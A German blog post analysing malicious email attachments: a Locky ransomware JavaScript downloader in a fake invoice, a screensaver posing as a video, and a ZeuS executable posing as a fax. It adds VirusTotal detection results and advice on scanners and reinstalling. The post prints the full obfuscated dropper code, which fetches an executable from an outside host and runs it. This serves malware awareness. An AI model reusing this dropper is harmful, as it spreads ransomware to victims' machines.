Die mir zugeschickte vermeintliche Rechnung oder das Fax enthält einen Anhang, der mit knapp über 700 Bytes (!)  einfach zu klein für ein PDF ist.

Was ist da los? Kein Virenscanner erkennt die zip Datei und den Javascript-Inhalt als Container einer Virendatei? Keiner von 54 Scannern auf Virustotal schlägt Alarm? Mein Kollege spekulierte gar nicht so abwegig: Das ist bestimmt der Bundestrojaner, der kommt „von oben“ und wird halt nicht erkannt.

Der Anhang enthält eine Javascript-Datei, die offeniichtlich  eine mit Unicode-verschleierte Webseite nachladen will. Sehr perfide, sehr geschickt.

Glaubt man den aktuellen Zahlen, werden pro Stunde 5000 Rechner in Deutschland vom enthaltenen Locky-Virus infiziert. Die Ransomware verschlüsselt die erreichbaren Dateien und man erhält  nur durch Zahlung eines Lösegeldes wieder die Ursprungsdateien zurück.

Siehe auch:
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript-1602-119331.html
Erpressungstrojaner Tesla (intern vrkennung.de)

Bildschirmfoto_2016-02-24_21-07-26

 

Die Verschleierung ist kein neues Thema:
http://www.heise.de/security/meldung/Rueckwaerts-wird-ein-Virus-draus-1242127.html

Code des Anhangs ( Javascript Datei hier als einfacher Text dargestellt und deshalb harmlos):

var fawqAx= this[‚\u0041c\u0074i\u0076\u0065XO\u0062je\u0063t‘];
var laMhHYOhH = new fawqAx(‚\u0057S\u0063r\u0069\u0070\u0074\u002E\u0053\u0068e\u006C\u006C‘);
var uDsEft = laMhHYOhH[‚\u0045x\u0070\u0061\u006E\u0064Envir\u006Fn\u006De\u006E\u0074S\u0074\u0072in\u0067s‘](‚\u0025TE\u004DP\u0025‘) + ‚\u002F\u0068\u0055O\u0048Mma\u0069n.\u0065x\u0065‘;
var nheEANo = new fawqAx(‚\u004D\u0053XM\u004C\u0032.X\u004D\u004C\u0048TT\u0050‘);
nheEANo[‚\u006Fn\u0072\u0065\u0061\u0064y\u0073\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e‘] = function() {
if (nheEANo[‚\u0072\u0065a\u0064\u0079\u0073t\u0061\u0074\u0065‘] === 4) {
var RxgIdfvB = new fawqAx(‚\u0041\u0044\u004F\u0044\u0042.S\u0074\u0072\u0065\u0061\u006D‘);
RxgIdfvB[‚op\u0065\u006E‘]();
RxgIdfvB[‚\u0074\u0079pe‘] = 1;
RxgIdfvB[‚\u0077ri\u0074\u0065‘](nheEANo[‚\u0052es\u0070\u006F\u006E\u0073e\u0042\u006F\u0064\u0079‘]);
RxgIdfvB[‚\u0070os\u0069\u0074\u0069\u006F\u006E‘] = 0;
RxgIdfvB[‚\u0073av\u0065\u0054o\u0046\u0069le‘](uDsEft, 2);
RxgIdfvB[‚\u0063lo\u0073\u0065‘]();
};
};
try {
var    HYOAzVaz = ‚R\u0075n‘;
nheEANo[‚\u006F\u0070en‘](‚GE\u0054‘ , ‚h\u0074\u0074p://\u0068t\u0074\u0070\u003A\u002F\u002F\u0066i\u0072\u0073t\u0063o\u0070\u0079\u006Dall\u002E\u0063\u006F\u006D/\u0073\u0079\u0073t\u0065m\u002F\u006Co\u0067\u0073\u002F\u0038\u0037h7\u00354‘, false);
nheEANo[‚\u0073e\u006Ed‘]();
laMhHYOhH [HYOAzVaz](uDsEft, 1, false);
} catch (ajg9ggxFs) {};

Da schickt mir Phoebe eine Mail mit Anhang „video.zip“?

Re:Hallo bitte geben Sie mir nur eine Minute Ihrer Zeit. Ok? Phoebe. Gesendet von meinem Asus MeMO Pad.

Ganz schön wortkarg, die liebe Phoebe.  Achso, sie tippt auf einem Tablett – da würde ich mich natürlich auch kurzfassen wollen.

Der Anhang?

Soll mich wohl neugierig machen, das Video von Phoebe.

Wir wissen ja, wohin das führt. Das gezippte „Video“ ist in Wirklichkeit ein scr-Datei, „scr“ steht für“ Screensaver“. Aha, also ein ausführbarer Windows-Bildschirmschoner,  natürlich ein Virus. Hätte mich auch gewundert, was für ein tolles Video in 97 kb verborgen sein könnte 😉

Irgendwie bin ich ja neugierig, was meine Wine-Umgebung daraus machen würde – aber ich glaub, ich lasse das vorerst. Wenn ich Zeit finde werde ich mal eine virtuelle Maschine damit glücklich machen.

Das Ergebnis bei Virustotal ist so eindeutig, eindeutiger geht es nicht mehr. Interessant, der erste Scan war bereits im September! Kann ich daraus schließen, dass  die Masche also so erfolgreich ist?

Bildschirmfoto vom 2014-10-05 19:39:16

 

aufklappen: Situationsbeschreibung

aufklappen: zum Verständnis

Ich werde dazu sicherlich noch mehr ergänzen und/oder hier verlinken. Nun vorab hier in Kürze eine kleine Liste von Sicherheitsprogrammen für Windows zur zusätzlichen Prüfung neben dem bereits installierten Virenscanner. Beachten Sie bitte jeweils die Lizenzbedingungen der einzelnen Produkte.

Aktuell empfiehlt T-Online zur Diagnose den Malwarescanner von
Malwarebytes.org. Sie finden dort im Downloadbereich den Eintrag „Chameleon“, das als Zip-Datei für Schadsoftware unverfänglicher ist. Die Lösungen wurden auch von vielen Kundinnen und Kunden erschreckend erfolgreich getestet und „beißt“ sich nicht mit den üblichen Virenscannern. Nach dem erfolgreichen Durchlauf sollten Sie das Programm deinstallieren.

Den freien Browserschutz Malwarebytes Anti-Rootkit sollten Sie installieren, wenn Ihr installiertes Sicherheitspaket keinen Browserschutz bietet. Dies ist häufig bei den freien Antivirus-Lösungen der Fall. Gerade die beliebte Antivir-Software (roter Regenschirm) ergänzt sich mit dem Anti-Rootkit sehr gut.

Andere zusätzliche Prüfprogramme:

Autostart-Prüfung mit Autoruns von Sysinternals (Microsoft): Prüft seit Version 13 gegen die Virustotal-Datenbank. (05.02.15)
Safetyscanner von Microsoft: Ein Programm vom Hersteller des Betriebssystems. Der Ruf der Microsoft-Tools war früher nicht der allerbeste, aber Microsoft konnte einiges an Boden gut machen.

Eset online scanner: Scannt auf Anforderung, direkt per Klick und einfach zu bedienen.

Emsisoft: Deren Tools wurden mir gestern noch einmal empfohlen. Speziell das Emergency Kit, scheint mir eine spanndende Sache zu sein. Das Kit kann auf einem USB-Stick entpackt werden und das Anti-Malware Tool ist auch für den normalen Anwender verwendbar, während einige der anderen Programme eher für Fortgeschrittene geeignet sind. (21.09.2014)

Super Antispyware habe ich selbst noch nicht getestet, macht aber einen bedienbaren Eindruck. (21.09.2014)

Die Hitman-Tools von surfright kenne ich dagegen schon länger und kann es auch empfehlen, wenn man etwas Englisch kann. (21.09.2014)

zusätzlich Rootkitscanner gmer (eher für Fortgeschrittene): Ein sogenannter “Rootkitscanner”, der das Windowssystem auf Manipulationen untersucht.

aufklappen: Online Tests

Etwas gefunden? Keine Panik!

Auf dem Weg zur Arbeit entspanne ich mich noch etwas und schaue noch einmal nach, was sich an der „Trojanerfront“ getan hat.

Nach einer Aktualisierung meldet sich nun auch der von Microsoft eingebaute Virenscanner. Gar nicht so schlecht für ein kostenloses Produkt. Der Virenscanner von Microsoft für Windows 8 hat auch bei einigen Tests relativ gut abgeschnitten.

Windows_Defender

Jetzt bin ich neugierig, ob nun alle anderen meinen „Griechen“ in der Zip-Datei auch errkennen. Ein neuer Scan zeigt nun 33 von 53. Folgende Antivir-Programme scheinen nicht zu funktionieren – oder taugen schlichtweg nichts. So ein Einzelergebnis ist sicherlich nicht repräsentabel, aber es handelt sich beim Fund um einen fiesen Vertreter der Man-in-the-Browser Trojaner, ZBot, bzw. ZeuS. Diese Gruppe ist eine wahre Pest unter den „Banktrojanern“ und Botnetzen.

AegisLab 20140528
Agnitum 20140527
AhnLab-V3 20140527
Baidu-International 20140527
Bkav 20140527
ByteHero 20140528
CAT-QuickHeal 20140527
CMC 20140526
ClamAV 20140528
Comodo 20140528
Jiangmin 20140528
K7AntiVirus 20140527
K7GW 20140527
NANO-Antivirus 20140528
SUPERAntiSpyware 20140528
TheHacker 20140528
TotalDefense 20140527
VBA32 20140527
ViRobot 20140528
Zillya 20140528

Ich scanne die gleiche Datei noch einmal bei jotti, einem Angebot wie Virustotal.

Jotti

Es ist erschreckend. Angeblich sind die Erkennungsdateien aktuell und trotzdem finden einige namhafte Hersteller nichts, die bei virustotal aber schon alles richtig identifiziert hatten. Mein vorläufiges Fazit: Diese Dienste sind in nützliches Tool, man sollte aber immer seinem gesunden Misstrauen trauen.

Und schon wieder erreichen mich massenhaft als Faxe getarnte Viren. So neu, dass mein Virenscanner keinen Alarm schlägt.

Faxnachricht [Caller-ID: +49(0)3032734xxx Seiten: 4. Datum: 2014-05-13 09:50:59 UTC. Kennziffer: DE5065AF3275BD6626BE.

Im Zip-Anhang befindet sich das Trojanische Pferd. Ok, eigentlich ist der Anhang ja selbst das trojanische Pferd, also befindet sich im Anhang „der Grieche“, richtig?

Erst in der Detail-Anzeige wird deutlich: Es handelt sich nicht um ein Fax, also eine Bilddatei oder ein PDF, sondern um eine Anwendung. Ausführen der Datei reicht also für die Infektion.

Je nach Ansicht erkennt man leider nicht, was sich im Pferd, also im Anhang verbirgt, bestenfalls das Icon könnte eine Ahnung aufkommen lassen, dass es sich nicht um das angekündigte Fax handelt. Erst nach Klick auf „Ansicht“ und „Details“ lässt sich erkennen, was los ist. Das System würde mir vor Ausführung einer solchen Datei einen Hinweis geben, Aber wer mit einem Fax rechnet (ich bekomme täglich welche), fällt eventuell schnell drauf rein.

Grieche noch getarnt

Der Typ „Anwendung“ verrät, dass es sich um ein ausführbares Programm handelt.

Datei im trojanischen Pferd

Ein Rechtsklick zeigt mir die Dateiendung und auch, wie alt die Datei ist. Hm, 26.05., also von gestern. Mal schauen, was die Virenscanner dazu sagen…

Eigenschaften_Grieche

Ich werde mal bei Virustotal nachsehen, einem Dienst, bei dem man u.a. verdächtige Dateien hochladen und von einer Flotte von Virenscannern prüfen lassen kann.

Virustotal_01Ich lade die Datei hoch und erhalte den Hinweis, dass diese Datei bereits gestern überprüft wurde. Also war jemand schon vor mir misstrauisch und hat die Datei bei Virustotal checken lassen. Ich gebe mich vorerst mit dem gestrigen Ergebnis zufrieden: Aha: Nur 2 (!) von 53 von Virenscannern haben beim ersten Scan diese Datei für verdächtig gehalten! Wenn ich also einer der ersten gewesen wäre, der dieses vermeintliche Fax erhalten hätte, dann hätte ich womöglich also eine knapp 4 prozentige Chance gehabt, dass mein Virenscanner sich gemeldet hätte?

Virustotal_Scan_01Gut, ich weiß ja, dass es Malware sein muss. Ich lasse erneut checken und inzwischen haben 16 von 53 einen Verdacht. Naja, auch noch nicht soo toll, oder?!

Ich lasse die Datei erneut scannen, mal sehen, was ein Scan einen Tag später ergibt. Schon besser, 16 Scanner schlagen Alarm. Aber so richtig toll ist das Ergebnis auch nicht, oder?Virustotal_Scan_02

Hier geht die Geschichte am nächsten Tag weiter.

Fragezeichen_100Frage: Soll man nun versuchen, den Rechner zu desinfizieren oder muss das komplette System neu installiert werden?

Stellen Sie sich selbst folgende wichtige Frage, bevor Sie an die Sache herangehen: Ist Ihr Computer womöglich ein Beweismittel? So lange Sie dies nicht mit einem klaren Nein beantworten können, sollten Sie keine Spuren verwischen!

Die einen Fachleute empfehlen eine komplette Neuinstallation (nach einer Sicherung der kompletten Daten), eine andere, kleinere Fraktion empfiehlt nach Analyse eine gezielte Desinfektion. Die einen sagen: Einem einmal infizierten Rechner kann man nicht mehr trauen, die anderen sagen: Eine Neuinstallation sei zu aufwändig und erzeugt bei der Installation neue Sicherheitslücken, da eine ganze Zeit ohne aktuelles System gearbeitet werden muss.

Ich bin der Meinung, dass eine Desinfektion nur dann sinnvoll ist, wenn wirklich jemand mit Fachwissen zur Verfügung steht, der/die

a) genau weiß, was er/sie tut,erste_Hilfe
b) die Desinfektion signifikant günstiger ist oder
c) keine Alternative besteht, weil z.B. die Nach-Installation einiger unverzichtbarer Programme nicht mehr möglich ist, z.B., weil Programm-CDs nicht mehr zur Verfügung stehen.
d) und nicht zuletzt: Die entdeckte Malware eher harmlos ist – und wer kann dies schon wirklich beurteilen?

Dazu kommt noch der Kostenfaktor. Eine Neuinstallation kann zeitlich und finanziell günstiger sein und hat mit dem Aufräumen auch häufig einen „Jungbrunneneffekt“ für ältere Rechner.

Prüfen Sie vor allen Aktionen unbedingt, ob Sie sämtliche wichtigen Daten gesichert haben. Schauen Sie nach, ob Sie sämtliche Lizenznummern und Aktivierungscodes gesichert haben.

Erstellen Sie ggf. eine Image Ihrer Festplatte, also ein Komplettbackup, dass Ihr System komplett wieder herstellen kann. Bekannte Tools sind z.B. Norton Ghost, Acronic Disk Image.

Tipp: Überlegen Sie, ob der Einbau einer neuen Festplatte nicht praktische Vorteile bietet: Die alte, eventuell noch verseuchte Platte können Sie in ein externes USB-Gehäuse einbauen (lassen) und damit über das System säubern. Die neue, meist größere und schnellere Platte dient dann der Neuinstallation Ihres Betriebssystems. Lassen Sie sich beraten, da diese Lösung nicht immer funktioniert, bei verschlüsselten Datenträgern z.B. kann es gewaltig schief gehen.

Die alte Platte können Sie erstmal zur Seite legen und in Ruhe die neue Platte einbauen und dort das Betriebssystem installieren. An der Stelle: Was halten Sie davon, bei der Gelegenheit einen Teil der Platte einem alternativen Betriebssystem, nämlich Linux zur Verfügung zu stellen? Hier ist die Virengefahr vorhanden und das Surfen und E-Mail funktioniert dort genauso gut, wie unter Windows. An die Bedienung werden Sie sich schnell gewöhnen.